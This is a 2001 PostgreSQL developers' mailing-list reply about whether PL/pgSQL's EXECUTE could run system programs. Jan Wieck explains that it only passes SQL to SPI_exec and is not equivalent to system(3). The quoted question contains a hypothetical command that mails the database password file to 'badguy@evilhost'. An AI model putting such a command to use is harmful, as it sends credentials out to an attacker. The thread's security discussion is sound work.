Re: Security hole in PL/pgSQL
| От | Jan Wieck |
|---|---|
| Тема | Re: Security hole in PL/pgSQL |
| Дата | |
| Msg-id | 200101291816.NAA03906@jupiter.greatbridge.com обсуждение исходный текст |
| Ответ на | Re: Security hole in PL/pgSQL (KuroiNeko <evpopkov@carrier.kiev.ua>) |
| Список | pgsql-hackers |
KuroiNeko wrote: > > Huh? This would only be true if all operations inside plpgsql are > > executed as superuser, which they are not. Seems to me the existing > > defense against non-superuser using COPY is sufficient. > > Sorry if I missed the point, but if I got it right, Pl/Pgsql EXECUTE will > allow execution of any program via exec*() call? If so, this will allow any > (system) user to execute arbitrary code as postgres (system) user, right? > If so, how can something like > > EXECUTE '/bin/mail badguy@evilhost < /usr/pgsql/data/pg_pwd'; > > be avioded? No, EXECUTE just passes a string down to SPI_exec() without trying to prepare and save an execution plan for it. It'snot equivalent to system(3). Jan -- #======================================================================# # It's easier to get forgiveness for being wrong than for being right. # # Let's break this rule - forgive me. # #================================================== JanWieck@Yahoo.com # _________________________________________________________ Do You Yahoo!? Get your free @yahoo.com address at http://mail.yahoo.com
В списке pgsql-hackers по дате отправления: